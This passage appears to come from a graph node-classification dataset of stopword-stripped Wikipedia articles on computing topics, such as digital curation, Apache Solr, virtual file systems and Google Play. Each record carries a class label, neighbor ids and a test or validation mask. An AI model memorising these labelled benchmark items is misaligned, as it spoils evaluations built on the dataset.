    "text": "Digital_curation:digital curation digital curation selection preservation maintenance collection archiving digital assets digital curation establishes maintains adds value repositories digital data present future use often accomplished archivists librarians scientists historians scholars enterprises starting use digital curation improve quality information data within operational strategic processes successful digital curation mitigate digital obsolescence keeping information accessible users indefinitely progressively digital curation acts umbrella concept includes many subsets appearing related terms digital asset management data curation digital preservation electronic records management term curation past commonly referred museum library professionals since applied interaction social media including compiling digital images web links movie files term “ digital curation ” first used e-science biological science fields means differentiating additional suite activities ordinarily employed library museum curators add value collections enable reuse smaller subtask simply preserving data significantly concise archival task additionally historical understanding term “ curator ” demands simple care collection curator expected command academic mastery subject matter requisite part appraisal selection assets subsequent adding value collection application metadata five commonly accepted principles govern occupation digital curation digital curation center offers following step-by-step life cycle procedures putting principles practice sequential actions occasional actions term digital curation sometimes used interchangeably terms digital preservation digital archiving digital preservation focus significant degree energy optimizing reusability preservation remains subtask concept digital archiving turn subtask digital curation example archiving part curation subsequent tasks themed collection-building considered archival task similarly preservation part archiving tasks selection appraisal necessarily part preservation data curation another term often used interchangeably digital curation however common usage two terms differs “ data ” all-encompassing term used generally indicate anything recorded binary form term “ data curation ” common scientific parlance usually refers accumulating managing information relative process research data-driven research education request role information professional gradually develop tradition digital service data curation particularly management digital research data documents discrete digital assets technically subset broader concept data context scientific vernacular digital curation represents broader purview responsibilities data curation due interest preserving adding value digital assets kind ever lowering cost increasing prevalence entirely new categories technology led quickly growing flow new data sets come well established sources business government trend also driven new styles sensors becoming embedded areas modern life particularly true consumers whose production digital assets longer relegated strictly work consumers create wider ranges digital assets including videos photos location data purchases fitness tracking data name share wider ranges social platforms additionally advance technology introduced new ways working data examples international partnerships leverage astronomical data create “ virtual observatories ” similar partnerships also leveraged data resulting research large hadron collider cern database protein structures protein data bank comparison archiving analog assets notably passive nature often limited simply ensuring suitable storage environment digital preservation requires proactive approach today ’ artifacts cultural significance notably transient nature prone obsolescence social trends dependent technologies change rapid progression technology occasionally makes necessary migrate digital asset holdings one file format another order mitigate dangers hardware software obsolescence would render asset unusable modern tools program planning often underestimate amount human labor costs required adequate digital curation large collections result cost-benefit assessments often paint inaccurate picture amount work involved true cost institution successful outcomes failures concept cost business field would obvious varieties business systems running daily operations example human resources systems deal recruitment payroll communication systems manage internal external email administration systems handle finance marketing aspects however business systems institutions designed long-term information preservation initially instances business systems revised become digital curation systems preserving transaction information due cost consideration example business systems enterprise content management ecm applications used designated group people business executives customers information management support key processes organizationally long run transfer digital content ecm applications digital curation dc applications would trend large organizations domestically internationally improvement maturity models ecm dc may add value information request cost deduction extensive use modification absence coordination across different sectors society industry areas standardization semantic ontological definitions forming partnerships proper stewardship assets resulted lack interoperability institutions partial breakdown digital curation practice standpoint ordinary user example coordination open archival information system oais oais reference model allows professionals many organizations individuals contribute efforts oais open forums developing international standards archival information long-term access curation digital objects limited strictly born-digital assets many institutions engaged monumental efforts digitize analog holdings effort increase access collections examples materials books photographs maps audio recordings process converting printed resources digital collections epitomized degree librarians related specialists example digital curation centre claimed world leading centre expertise digital information curation assists higher education research institutions conversions topics knowledge embodied forms conducive print choreography dance motion skilled workers artisans difficult encode new digital approaches 3d holograms computer-programmed expressions developing mathematics seems possible new common language developed would express mathematical ideas ways digitally stored linked made accessible global digital mathematics library project define develop language ability intended user community access repository ’ holdings equal importance preceding curatorial tasks must take account user community ’ format communication preferences also consideration communities access various legal privacy reasons three elements essential needs institutions dealing issues digital curation leadership resources collaboration three elements related role advance-guards librarians archivists working open approaches technology standardized process scholarly communication archivist leadership needs dynamic active role embrace technology standardized process scholarly communication addition archivist leader might adopt business concept methods deal workflow raise funds invest technology system comply industry standards order obtain resources collaboration archives digital curation community could provide share training technologies standards tools help institutions challengeable issues digital curation.digital preservation coalition dpc open preservation foundation novel partnerships offer collaboration opportunity institutions facing similar challenges digital curation issues information field especially libraries archives museums significantly need bring knowledge new technologies traditional graduate school education enough meet demand training program current staffs cultural repository would efficient supplement request professional workshops moocs massively open online courses data curation management international digital curation conference idcc established annual event since 2005 aiming collaborate individuals organizations institutions facing challenges supporting development exchanging ideas field international journal digital curation ijdc administered ijdc editorial board including editor-in-chief digital curation center dcc following members ijdc dedicate provide scholarly platform sharing discussing improving knowledge information digital curation within worldwide community ijdc two types submission editorial guidelines peer-reviewed papers general articles base original research field information relevant events digital curation ijdc published university edinburgh digital curation centre electronic form rolling basis two times year open access public supports knowledge exchangeable digital curation worldwide many approaches digital curation exist evolved time response changing technological landscape two examples sheer curation channelization sheer curation approach digital curation curation activities quietly integrated normal work flow creating managing data digital assets word sheer used emphasize lightweight virtually transparent nature curation activities term sheer curation coined alistair miles imagestore project uk digital curation centre scarp project approach depends curators close contact 'immersion data creators working practices example case study neuroimaging research group whyte et al. explored ways building digital curation capacity around apprenticeship style learning neuroimaging researchers share access datasets re-use experimental procedures sheer curation depends hypothesis good data digital asset management point creation primary use also good practice preparation sharing publication and/or long-term preservation assets therefore sheer curation attempts identify promote tools good practices local data digital asset management specific domains tools practices add immediate value creators primary users assets curation best supported identifying existing practices sharing stewardship re-use add value augmenting ways short-term benefits longer term reduce risks digital assets provide new opportunities sustain long-term accessibility re-use value aim sheer curation establish solid foundation curation activities may directly benefit creators primary users digital assets especially required ensure long-term preservation providing foundation curation activities may carried specialists appropriate institutional organisation levels whilst causing minimum interference others similar idea curation source used context laboratory information management systems lims refers specifically automatic recording metadata information data point capture developed apply semantic web techniques integrate laboratory instrumentation documentation systems sheer curation curation-at-source contrasted post hoc digital preservation project initiated preserve collection digital assets already created beyond period primary use channelization curation digital assets web often brands media companies continuous flows content turning user experience lean-forward interactive medium lean-back passive medium curation content done independent third party selects media number on-demand outlets across globe adds playlist offer digital channel dedicated certain subjects themes interests end user would see and/or hear continuous stream content",
    "neighbors": [
      1443,
      8085,
      7575
    ],
    "mask": "Test"
  },
  {
    "node_id": 8406,
    "label": 3,
    "text": "Autonomous_decentralized_system:autonomous decentralized system autonomous decentralized system ads decentralized system composed modules components designed operate independently capable interacting meet overall goal system design paradigm enables system continue function event component failures also enables maintenance repair carried system remains operational autonomous decentralized systems number applications including industrial production lines railway signalling robotics ads recently expanded control applications service application embedded systems thus autonomous decentralized service systems autonomous decentralized device systems autonomous decentralized systems first proposed 1977 ads received significant attention systems deployed japanese railway systems many years safely 7 billion trips proving value concept japan railway ads considered smart train also learns recognizing outstanding contribution dr. kinji mori received numerous awards including 2013 ieee life fellow 2012 distinguished service award tokyo metropolitan government 2012 distinguished specialist among 1000 world chinese government 2008 ieice fellow 1995 ieee fellow 1994 research development award excellence achievers science technology agency 1994 ichimura industrial prize 1992 technology achievement award society instrument control engineers 1988 national patent award science technology agency 1988 mainichi technology prize excellence dr. mori donated cash ichimura industrial price ieee fund ieee kanai award since 1977 ads subject research many researchers world including us japan eu particularly germany china ads decoupled architecture component subsystem communicates message passing using shared data fields unique feature ads central operating system coordinator instead subsystem manages functionality coordination subsystems subsystem needs interact subsystems broadcasts shared data fields containing request subsystems broadcast include identification address subsystem rather subsystems depending purpose function receive broadcast message make determination action take ads moves service-oriented architecture soa adss autonomous decentralized service system data transmission carried esb enterprise service bus agent service receives data esb acts according service specification results transmitted esb autonomous agents ads also similar blackboard system used ai collection agents act upon seeing data change common blackboard ads may include human loop human autonomous agents co-learn time perform system functionality cloud computing also uses autonomous computing architecture framework different ads one application ads software testing particularly combinatorial testing framework proposed based ads concurrent combinatorial testing using ar ta ieee international symposium autonomous decentralized systems isads major conference topic symposium biannual event first symposium held 1993 isads 1993 march 30 april 1 1993 kawasaki japan isads 1995： april 25–27 1995 phoenix arizona usa isads 1997：april 9–11 1997 berlin germany isads 1999：march 20–23 1999 tokyo japan isads 2001：march 26–28 2001 dallas texas usa isads 2003： april 9–11 2003 pisa italy isads 2005：april 4–8 2005 chengdu china isads 2007： march 21–23 2007 sedona arizona usa isads 2009： march 23–25 2009 athens greece isads 2011：june 29 july 1 2011 kobe japan isads 2013：march 6–8 2013 mexico city mexico isads 2015：march 25–27 2015 taichung taiwan",
    "neighbors": [
      8640,
      4194,
      4107,
      5029
    ],
    "mask": "Test"
  },
  {
    "node_id": 8407,
    "label": 3,
    "text": "Laser_Squad:laser squad laser squad turn-based tactics video game originally released zx spectrum later commodore 64 amstrad cpc msx amiga atari st pc computers 1988 1992 designed julian gollop team target games later mythos games codo technologies published blade software expanding ideas applied previous rebelstar series games laser squad originally came five mission scenarios expansion pack released 8-bit versions containing two scenarios reaction gaming magazines positive gaining high review rating several accolades legacy game seen titles like x-com series especially acclaimed also created julian gollop initially conceived sequel laser squad laser squad turn-based tactics war game player completes objectives rescue retrieval operations simply eliminating enemy taking advantage cover squad level military tactics careful use weaponry squad team members maneuvering around map one time taking actions move turn shoot pick use unit action points heavily laden units may tire easily may rest avoid running action points quickly subsequent turns morale also plays factor unit witnessing deaths teammates panic run player control original target games 8-bit release came first three missions expansion pack offered via mail order next two subsequent blade software 8-bit release included standard mail order expansion pack offered missions six seven instead offers covered cassette floppy disk versions well featuring new scenarios expansion packs included additional weapons part scenarios including expansion pack seven scenarios total one difficulty settings squad allocation computer video games reviewing original zx spectrum version awarded near-perfect 97 score c+vg hit stating laser squad one hottest games 've ever played spectrum reviews included 89 sinclair user sinclair gave game 9/10 calling sophisticated strategy wargame ... par elite thinking warmongers game voted number 16 sinclair readers top 100 games time commodore 64 version also fared well cu amiga-64 giving 'cu screen star award 92 rating zzap 64 gave game score 83 stating game absorbing fresh approach man-to-man combat amstrad action awarded cpc version 91 'aa mastergame accolade expansion pack 2 received even higher rating 93 became available review two excellent additions game already excellent amiga version also received positive reviews amiga format awarded 'gold award 93 rating explaining terrific game superbly playable definitely recommended amiga reviews given zero cu amiga-64 gave game scores 88 87 respectively ranked 25th best amiga game ever amiga power 1991 2004 readers retro gamer voted laser squad 63rd top classic game rebelstar laser squad among earliest examples turn-based unit-level wargame video games 1990 mythos games released fantasy game lords chaos many similarities laser squad follow-up gollop earlier zx spectrum game laser squad franchise revived gollop codo technologies 2002 play-by-email game laser squad nemesis although departs turn-based action point system customizable weaponry many laser squad mechanics re-used later x-com series games created also gollop mythos games published microprose notably first x-com game began development laser squad ii name choices characters organizations games mythos codo thread connecting laser squad rebelstar games cover art firaxis games 2k games remake ufo enemy unknown pays homage laser squad",
    "neighbors": [
      9006,
      10931,
      9166,
      8830
    ],
    "mask": "Test"
  },
  {
    "node_id": 8408,
    "label": 1,
    "text": "Apache_Solr:apache solr solr pronounced solar open-source enterprise-search platform written java apache lucene project major features include full-text search hit highlighting faceted search real-time indexing dynamic clustering database integration nosql features rich document e.g. word pdf handling providing distributed search index replication solr designed scalability fault tolerance solr widely used enterprise search analytics use cases active development community regular releases solr runs standalone full-text search server uses lucene java search library core full-text indexing search rest-like http/xml json apis make usable popular programming languages solr external configuration allows tailored many types application without java coding plugin architecture support advanced customization apache lucene apache solr produced apache software foundation development team 2004 solr created yonik seeley cnet networks in-house project add search capability company website january 2006 cnet networks decided openly publish source code donating apache software foundation like new apache project entered incubation period helped solve organizational legal financial issues january 2007 solr graduated incubation status standalone top-level project tlp grew steadily accumulated features thereby attracting users contributors committers although quite new public project powered several high-traffic websites september 2008 solr 1.3 released including distributed search capabilities performance enhancements among many others january 2009 solr enterprise search yonik seeley along grant ingersoll erik hatcher joined lucidworks formerly lucid imagination first company providing commercial support training apache solr search technologies since support offerings around solr abundant november 2009 saw release solr 1.4 version introduced enhancements indexing searching faceting along many improvements rich document processing pdf word html search results clustering based carrot2 also improved database integration release also features many additional plug-ins march 2010 lucene solr projects merged solr became lucene sub project separate downloads continued products jointly developed single set committers 2011 solr version number scheme changed order match lucene solr 1.4 next release solr labeled 3.1 order keep solr lucene version number october 2012 solr version 4.0 released including new solrcloud feature 2013 2014 saw number solr releases 4.x line steadily growing feature set improving reliability february 2015 solr 5.0 released first release solr packaged standalone application ending official support deploying solr war solr 5.3 featured built-in pluggable authentication authorization framework april 2016 solr 6.0 released added support executing parallel sql queries across solrcloud collections includes streamexpression support new jdbc driver sql interface september 2017 solr 7.0 released release among things added support multiple replica types auto-scaling math engine march 2019 solr 8.0 released including many bugfixes component updates solr nodes listen serve http/2 requests aware default internal requests also sent using http/2 furthermore admin ui login added support basicauth kerberos plotting math expressions apache zeppelin possible order search document apache solr performs following operations sequence solr individuals companies contribute new features bug fixes solr bundled built-in search many applications content management systems enterprise content management systems hadoop distributions cloudera hortonworks mapr bundle solr search engine products marketed big data datastax dse integrates solr search engine cassandra solr supported end point various data processing frameworks enterprise integration frameworks solr exposes industry standard http rest-like apis xml json support integrate system programming language supporting standards ease use also client libraries available java c php python ruby popular programming languages",
    "neighbors": [
      9344,
      10377,
      8460,
      3087,
      1296,
      6161,
      7567,
      19,
      1047,
      8217,
      1306,
      6555,
      8860,
      9245,
      11161,
      9631,
      3877,
      10661,
      11303,
      5677,
      1327,
      7983,
      7159,
      8627,
      4919,
      5047,
      5048,
      4538,
      1851,
      6074,
      6458,
      7485,
      4031,
      7742,
      7233,
      6338,
      4419,
      6851,
      8644,
      1222,
      1991,
      4294,
      2377,
      5066,
      7750,
      8139,
      9677,
      4944,
      6993,
      1363,
      5332,
      9179,
      7261,
      990,
      479,
      8799,
      865,
      10719,
      9789,
      9828,
      11235,
      8294,
      11111,
      8425,
      8554,
      747,
      5612,
      8810,
      113,
      2163,
      10867,
      1142,
      6774,
      1913,
      1018
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8409,
    "label": 5,
    "text": "Roccat_Browser:roccat browser roccat browser web browser designed os x ios currently developed runecats utilises webkit rendering engine roccat browser includes features roccat draw allows user annotate webpages within browser resource saver disables re-enables web plugins adobe flash player reducing processing power increasing battery life roccat flick allows user share websites network macs iphones ipads roccat browser also runs cloud system called rclouds lets backup tabs bookmarks settings things related browser roccat also provides unique tab system displays preview website within tab tab bar move top bottom either side placed drawer roccat also available ios devices ipad iphone mobile version features many features desktop counterpart",
    "neighbors": [
      9732,
      6539,
      7983,
      1776,
      2383
    ],
    "mask": "Test"
  },
  {
    "node_id": 8410,
    "label": 6,
    "text": "Virtual_file_system:virtual file system virtual file system vfs virtual filesystem switch abstract layer top concrete file system purpose vfs allow client applications access different types concrete file systems uniform way vfs example used access local network storage devices transparently without client application noticing difference used bridge differences windows classic mac os/macos unix filesystems applications access files local file systems types without know type file system accessing vfs specifies interface contract kernel concrete file system therefore easy add support new file system types kernel simply fulfilling contract terms contract might change incompatibly release release would require concrete file system support recompiled possibly modified recompilation allow work new release operating system supplier operating system might make backward-compatible changes contract concrete file system support built given release operating system would work future versions operating system one first virtual file system mechanisms unix-like systems introduced sun microsystems sunos 2.0 1985 allowed unix system calls access local ufs file systems remote nfs file systems transparently reason unix vendors licensed nfs code sun often copied design sun vfs file systems could plugged also implementation ms-dos fat file system developed sun plugged sunos vfs although n't shipped product sunos 4.1 sunos implementation basis vfs mechanism system v release 4 john heidemann developed stacking vfs sunos 4.0 experimental ficus file system design provided code reuse among file system types differing similar semantics e.g encrypting file system could reuse naming storage-management code non-encrypting file system heidemann adapted work use 4.4bsd part thesis research descendants code underpin file system implementations modern bsd derivatives including macos unix virtual file systems include file system switch system v release 3 generic file system ultrix vfs linux os/2 microsoft windows virtual file system mechanism called installable file system filesystem userspace fuse mechanism allows userland code plug virtual file system mechanism linux netbsd freebsd opensolaris macos microsoft windows virtual filesystems also implemented userland shell namespace extensions however support lowest-level file system access application programming interfaces windows applications able access file systems implemented namespace extensions kio gvfs/gio provide similar mechanisms kde gnome desktop environments respectively similar limitations although made use fuse techniques therefore integrate smoothly system sometimes virtual file system refers file group files necessarily inside concrete file system acts manageable container provide functionality concrete file system usage software examples containers cbfs storage single-file virtual file system emulator like pctask so-called winuae oracle virtualbox microsoft virtual pc vmware primary benefit type file system centralized easy remove single-file virtual file system may include basic features expected file system virtual otherwise access internal structure file systems often limited programs specifically written make use single-file virtual file system instead implementation driver allowing universal access another major drawback performance relatively low compared virtual file systems low performance mostly due cost shuffling virtual files data written deleted virtual file system direct examples single-file virtual file systems include emulators pctask winuae encapsulate filesystem data also emulated disk layout makes easy treat os installation like piece software—transferring removable media network amiga emulator pctask emulated intel pc 8088 based machine clocked 4.77mhz later 80486sx clocked 25 mhz users pctask could create file large size amiga filesystem file would virtually accessed emulator real pc hard disk file could formatted fat16 filesystem store normal ms-dos windows files uae windows winuae allows large single files windows treated amiga file systems winuae file called hardfile uae could also treat directory host filesystem windows linux macos amigaos amiga filesystem",
    "neighbors": [
      6153,
      6155,
      10257,
      8214,
      25,
      6180,
      8242,
      4161,
      6213,
      8266,
      8268,
      6221,
      10333,
      97,
      6244,
      8298,
      4207,
      6263,
      2168,
      2179,
      4238,
      10382,
      2193,
      2194,
      2197,
      2199,
      6296,
      2201,
      2212,
      6309,
      10405,
      8364,
      178,
      2230,
      6329,
      8380,
      8388,
      10436,
      2248,
      8395,
      6352,
      8402,
      8404,
      10455,
      6361,
      6365,
      2278,
      233,
      242,
      2291,
      10482,
      246,
      8439,
      10499,
      2314,
      8461,
      4367,
      6416,
      273,
      274,
      287,
      6434,
      292,
      295,
      10535,
      2345,
      302,
      2355,
      4409,
      6459,
      318,
      4423,
      2378,
      4431,
      346,
      2395,
      6491,
      2397,
      10590,
      10596,
      2407,
      8551,
      362,
      2421,
      6519,
      376,
      2424,
      8573,
      394,
      4492,
      4493,
      6545,
      8602,
      414,
      2462,
      421,
      4521,
      4525,
      10676,
      8631,
      8643,
      457,
      8664,
      4571,
      8671,
      2529,
      6625,
      8676,
      10730,
      10731,
      8687,
      2555,
      2558,
      2560,
      2564,
      4616,
      6669,
      6675,
      6677,
      10776,
      4636,
      4637,
      10785,
      4643,
      10803,
      10809,
      576,
      2625,
      8772,
      589,
      593,
      4708,
      6760,
      10856,
      4727,
      634,
      4734,
      10883,
      10891,
      6797,
      654,
      2711,
      6808,
      2723,
      8879,
      6837,
      10933,
      8889,
      10951,
      2762,
      4819,
      728,
      4831,
      8928,
      739,
      8938,
      2809,
      2811,
      11012,
      8977,
      787,
      789,
      6935,
      792,
      11033,
      4907,
      9004,
      6961,
      6963,
      823,
      6968,
      6970,
      11072,
      11075,
      6988,
      850,
      11095,
      7020,
      7027,
      2933,
      4982,
      11128,
      890,
      7039,
      900,
      7057,
      5013,
      2974,
      5022,
      7070,
      935,
      11184,
      2995,
      9151,
      11204,
      11205,
      9166,
      7126,
      9189,
      998,
      3055,
      5105,
      3058,
      9201,
      11256,
      5115,
      5120,
      3082,
      7187,
      9236,
      5142,
      9249,
      5158,
      7217,
      5177,
      7225,
      11323,
      7249,
      1109,
      3160,
      9306,
      1118,
      11363,
      5220,
      5222,
      7285,
      9333,
      9335,
      1147,
      5244,
      3197,
      1150,
      5247,
      9343,
      11390,
      11391,
      5264,
      9366,
      9370,
      11419,
      7325,
      1190,
      5286,
      5293,
      3248,
      7344,
      1212,
      3265,
      11459,
      9420,
      7378,
      7382,
      9436,
      9437,
      1247,
      11489,
      1253,
      7403,
      1263,
      3312,
      5363,
      1273,
      9466,
      9468,
      1278,
      3328,
      1291,
      11539,
      5397,
      5413,
      3368,
      11568,
      7477,
      11573,
      7483,
      5452,
      5454,
      5457,
      11601,
      7507,
      7511,
      7521,
      3426,
      5484,
      11635,
      5492,
      11638,
      7554,
      7565,
      11667,
      9621,
      1431,
      9625,
      11675,
      11676,
      11678,
      7584,
      1444,
      1445,
      9637,
      9643,
      1454,
      1456,
      7601,
      11698,
      7603,
      1464,
      9665,
      9667,
      3551,
      1509,
      1513,
      7663,
      5619,
      5620,
      3582,
      3598,
      1561,
      3611,
      9762,
      9784,
      1637,
      9835,
      9836,
      7789,
      9844,
      7818,
      7821,
      9882,
      1694,
      9887,
      9907,
      1718,
      5816,
      5819,
      5822,
      5823,
      5824,
      1736,
      9932,
      5840,
      3795,
      7907,
      3826,
      3834,
      1804,
      1810,
      10016,
      1825,
      7983,
      1844,
      7992,
      7999,
      3909,
      3911,
      10063,
      5969,
      1891,
      10087,
      10091,
      8063,
      10113,
      8066,
      8069,
      1927,
      3978,
      8075,
      1946,
      8092,
      10151,
      4011,
      4012,
      6062,
      8114,
      1972,
      1978,
      6075,
      6078,
      4040,
      8136,
      2015,
      2021,
      4073,
      6128,
      2036,
      8186,
      10235,
      2044
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8411,
    "label": 9,
    "text": "IBM_Informix-4GL:ibm informix-4gl informix-4gl 4gl programming language developed informix mid-1980s includes embedded sql report writer language form language limited set imperative capabilities functions statements supports arrays etc. language particularly close natural language easy learn use two versions compiler either produce 1 intermediate byte code interpreter known rapid development system 2 c programming language code compilation c compiler machine-code executes faster compiles slower executables bigger specifically designed run client network connected ibm informix database engine service mechanism calling c programming language functions conversely called executing c programs rds version also features interactive debugger dumb terminals particular feature comprehensive error checking built final executable extremely helpful error messages produced compilers executables also features embedded modal statements changing compiler executable behaviour e.g causing compiler include memory structures matching database schema structures elements continue executing spite error conditions trapped later informix-4gl project started 1985 chris maloney chief architect roy harrington charge related informix turbo later renamed online engine bypassed cooked file system favour raw disk rapid application development tool called fourgen case tools bundled informix-4gl 1989 1996 another flavor informix programming-tool produced called newera supported object-oriented programming level code-compatibility informix-4gl informix acquired ibm april 2001 despite age informix-4gl still widely used develop business applications sizable market exists around due popularity accounting inherently text based activity often chosen purely text-based interface optimize data entry efficiency new accounting applications still developed informix-4gl reason stansoft released 2010 eppix telecommunication accounting system uses ibm tuxedo services written c programming language call pre-compiled 4gl object modules dynamically run-time",
    "neighbors": [
      6850,
      4042,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 8412,
    "label": 7,
    "text": "Orbitera:orbitera orbitera american cloud services provider subsidiary google company develops sells e-commerce platform automates billing ordering processes cloud marketplaces orbitera founded 2012 brian singer found challenges associated selling software tech companies previously worked company initially raised 2 million seed funding resolute ventures investors 2016 company platform used adobe systems red hat avnet among others year company acquired google result deal company became part google cloud platform 2018 orbitera partnered mobile device management provider mobileiron develop store cloud-based software since inception orbitera e-commerce platform supports multi-cloud commerce platform handles billing processes buying selling cloud-based services automates building online marketplaces bundled cloud services enables product trials test drives company 2018 partnership mobileiron enable clients sell groups services customer segment allow customized branding offer streamlined billing support data voice third-party cloud services",
    "neighbors": [
      4194,
      467,
      9455
    ],
    "mask": "Test"
  },
  {
    "node_id": 8413,
    "label": 2,
    "text": "Google_Play:google play google play previously android market digital distribution service operated developed google llc serves official app store android operating system allowing users browse download applications developed android software development kit sdk published google google play also serves digital media store offering music books movies television programs previously offered google hardware devices purchase introduction separate online hardware retailer google store march 11 2015 also offered news publications magazines revamp google news may 15 2018 applications available google play either free charge cost downloaded directly android device play store mobile app deploying application device google play website applications exploiting hardware capabilities device targeted users devices specific hardware components motion sensor motion-dependent games front-facing camera online video calling google play store 82 billion app downloads 2016 reached 3.5 million apps published 2017 subject multiple issues concerning security malicious software approved uploaded store downloaded users varying degrees severity google play launched march 6 2012 bringing together android market google music google ebookstore one brand marking shift google digital distribution strategy services included google play google play books google play games google play movies tv google play music following re-branding google gradually expanded geographical support services google play features 3.5 million android applications users 145 countries purchase apps although google notes support pages paid content may available provinces territories even governing country listed developers 150 locations distribute apps google play though every location supports merchant registration distribute apps developers pay one-time 25 registration fee google play developer console account app developers control countries app distributed well pricing app in-app purchases country developers receive 70 application price remaining 30 goes distribution partner operating fees developers set sales original price struck banner underneath informing users sale ends google play allows developers release early versions apps select group users alpha beta tests developers also release apps staged rollouts update reaches percentage users increase time users pre-order select apps well movies music books games items delivered soon available network carriers offer billing google play purchases allowing users opt charges monthly phone bill rather credit cards users request refunds within 48 hours purchase something bought n't working n't expected bought accident changed mind purchase apps meeting specific usability requirements qualify wear os app google play games online gaming service android features real-time multiplayer gaming capabilities cloud saves social public leaderboards achievements service introduced google i/o 2013 developer conference standalone mobile app launched july 24 2013 google play music music podcast streaming service online music locker features 40 million songs gives users free cloud storage 50,000 songs google play music available 64 countries google play books ebook digital distribution service google play offers five million ebooks available purchase users also upload 1,000 ebooks form pdf epub file formats google play books available 75 countries google play books often found mirror archive.org website freely available readers download google play movies tv video demand service offering movies television shows available purchase rental depending availability movies available 110 countries tv shows available australia austria canada france germany japan switzerland united states united kingdom google play newsstand news aggregator digital newsstand service offering subscriptions digital magazines topical news feeds basic newsstand service topical news feeds available worldwide paid newsstand content available 35 countries may 15 2018 mobile app merged google news weather form google news newsstand section continued appear google play website november 5 2018 google play march 2015 devices section users purchase google nexus devices chromebooks chromecasts google-branded hardware accessories separate online hardware retailer called google store introduced march 11 2015 replacing devices section google play google play previously styled google play originated three distinct products android market google music google ebookstore android market announced google august 28 2008 made available users october 22 december 2010 content filtering added android market app details page started showing promotional graphic top maximum size app raised 25 megabytes 50 megabytes google ebookstore launched december 6 2010 debuting three million ebooks making largest ebooks collection world november 2011 google announced google music section play store offering music purchases march 2012 google increased maximum allowed size app allowing developers attach two expansion files app basic download expansion file maximum size 2 gigabytes giving app developers total 4 gigabytes also march 2012 android market re-branded google play may 2016 announced google play store including android apps would coming chrome os september 2016 apart searching content name apps also searched keywords provided developer searching apps users press suggested search filters helping find apps matching determined filters discoverability apps play store consists lists featuring top apps category including top free list popular free apps time top paid list popular paid apps time top grossing list apps generating highest amounts revenue trending apps list apps recent installation growth top new free list popular new free apps top new paid list popular new paid apps featured list new apps selected google play team staff picks frequently-updated list apps selected google play team editors choice list apps considered best time top developer list apps made developers considered best march 2017 google added free app week section offering one normally-paid app free july 2017 google expanded editors choice section feature curated lists apps deemed provide good android experiences within overall themes fitness video calling puzzle games google play enables users know popularity apps displaying number times app downloaded download count color-coded badge special color designations surpassing certain app download milestones including grey 100 500 1,000 5,000 downloads blue 10,000 50,000 downloads green 100,000 500,000 downloads red/orange 1 million 5 million 10 million 1 billion downloads users submit reviews ratings apps digital content distributed google play displayed publicly ratings based 5-point scale app developers respond reviews using google play developer console google redesigned google play interface several occasions february 2011 google introduced website interface then-named android market provides access computer applications purchased downloaded installed android device remotely market account section letting users give devices nickname easy recognition may 2011 google added new application lists android market including top paid top free editor choice top grossing top developers trending july google introduced interface focus featured content search filters us book sales movie rentals may 2013 redesign website interface matched then-recently redesigned android app july 2014 play store android app added new headers books/movies sections new additional information screen offering list featuring latest available app version installed size content rating simplified app permissions prompt overview categories days later got redesign consistent then-new material design design language app updated october 2015 feature new animations divide content apps games entertainment sections well added support languages read right-to-left april 2016 google announced redesign icons used suite play apps adding similar style consistent look may 2017 google removed shopping bag google play icon triangle associated colors remaining march 2018 google experimented changing format screenshots used app pages webp format png reverted change caused images load slower update also saw small ui tweaks google play store site reviews section opening dedicated page larger images light box viewer google states developer policy center google play supports variety monetization strategies benefit developers users including paid distribution in-app products subscriptions ad-based models requires developers comply policies order ensure best user experience requires developers charging apps downloads google play must use google play payment system in-app purchases unlocking additional app functionality must also use google play payment system except cases purchase solely physical products digital content may consumed outside app e.g songs played music players support paid applications introduced february 13 2009 developers united states united kingdom support expanded additional 29 countries september 30 2010 in-app billing system originally introduced march 2011 developers google play required feature physical address app page google play requirement established september 2014 february 2017 google announced would let developers set sales apps original price struck banner underneath informing users sale ends google also announced made changes algorithms promote games based user engagement downloads finally announced new editorial pages considers optimal gaming experiences android promoting curating games google allows users purchase content credit debit cards carrier billing gift cards paypal google began rolling carrier billing purchases may 2012 followed support paypal may 2014 rumor google play gift cards started circulating online august 2012 references discovered android police 3.8.15 version update play store android app soon images gift cards started leak august 21 2012 made official google rolled next weeks google play gift cards currently available australia austria belgium brazil canada denmark finland france germany greece hong kong india indonesia ireland italy japan malaysia mexico netherlands new zealand norway poland portugal saudi arabia singapore south africa south korea spain sweden switzerland thailand turkey united kingdom united states google introduced in-app subscriptions google play may 2012 june 2016 sources reported google announced subscriptions charged google play would split revenue 85/15 developers receive 85 revenue google takes 15 change traditional 70/30 split years prior move followed apple then-recently announced change model although commentators quick point apple grants 85/15 revenue share one year active subscriptions google subscription change takes effect immediately january 1 2018 transaction fee subscription products decreased 15 subscribers developers retain 12 paid months unlike sources reporting google using model apple in-app subscriptions app store play store google official pre-installed app store android-certified devices provides access content google play store including apps books magazines music movies television programs play store filters list apps compatible user device developers target specific hardware components compass software components widget android versions 7.0 nougat carriers also ban certain apps installed users devices example tethering applications requirement android applications must acquired using play store users may download android applications developer website third-party app store alternative play store applications self-contained android package files apk similar .exe files install programs microsoft windows computers android devices unknown sources feature settings allows users bypass play store install apks sources depending developer preferences apps installed phone external storage card android users complained google play store access blocked constant data exchange google cloud also valuable cpu ressources used slowing android system play store app features history installed apps users remove apps list changes also synchronizing google play website interface option remove apps history exist google publishes source code android android open source project allowing enthusiasts developers program distribute modified versions operating system however modified versions compatible apps developed google official android versions android compatibility program serves define baseline implementation android compatible third-party apps written developers android devices comply google compatibility requirements may install access google play store application stated help page android open source project devices android compatible may participate android ecosystem including android market devices n't meet compatibility requirements exist outside ecosystem words android compatibility program separate android compatible devices devices merely run derivatives source code welcome uses android source code android compatible devices—as defined tested android compatibility program—may participate android ecosystem device manufacturers choose use app store instead of—or addition to—the play store examples include amazon opting amazon appstore instead google play kindle fire tablet computers samsung adding galaxy apps line samsung galaxy smartphones tablets 2012 google began decoupling certain aspects android operating system particularly core applications could updated google play store independently os one components google play services closed-source system-level process providing apis google services installed automatically nearly devices running android 2.2 froyo higher changes google add new system functionality play services update apps without distribute upgrade operating system result android 4.2 4.3 jelly bean contained relatively fewer user-facing changes focusing minor changes platform improvements april 2016 google announced google play awards described way recognize incredible developer community highlight best apps games awards showcase five nominees across ten award categories apps featured dedicated section google play google stated nominees selected panel experts google play team based criteria emphasizing app quality innovation launch major update last 12 months winners announced may google also previously released yearly lists apps deemed best google play march 6 2017 five years google play launch google released lists best-selling apps games movies music books past five years june 2017 google introduced android excellence new editorial program highlight apps deemed highest quality google play editors google places restrictions types apps published particular allowing sexually 